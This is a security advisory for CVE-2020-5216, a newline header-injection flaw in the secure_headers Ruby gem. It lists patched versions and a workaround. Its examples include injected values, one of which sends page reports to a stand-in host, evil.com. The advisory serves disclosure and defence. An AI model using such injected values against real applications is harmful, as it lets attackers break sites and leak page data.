secure_headers header injection due to newline
Published: January 23, 2020
SECURITY IDENTIFIERS
- CVE: CVE-2020-5216 (NVD)
- GHSA: GHSA-w978-rmpf-qmwg
- Vendor Advisory: https://github.com/twitter/secure_headers/security/advisories/GHSA-w978-rmpf-qmwg
GEM
SEVERITY
CVSS v3.x: 4.4 (Medium)
PATCHED VERSIONS
~> 3.9
~> 5.2
>= 6.3.0
DESCRIPTION
If user-supplied input was passed into append/override_content_security_policy_directives, a newline could be injected leading to limited header injection.
Upon seeing a newline in the header, rails will silently create a new Content-Security-Policy header with the remaining value of the original string. It will continue to create new headers for each newline.
e.g.
override_content_security_directives(script_src: ['mycdn.com', "\ninjected\n"])
would result in
Content-Security-Policy: ... script-src: mycdn.com
Content-Security-Policy: injected
Content-Security-Policy: rest-of-the-header
CSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial:
override_content_security_directives(script_src: ["mycdn.com", "\ndefault-src 'none'; report-uri evil.com"])
Content-Security-Policy: ... script-src: mycdn.com
Content-Security-Policy: default-src 'none'; report-uri evil.com
Content-Security-Policy: rest-of-the-header
Workarounds
override_content_security_policy_directives(:frame_src, [user_input.gsub("\n", " ")])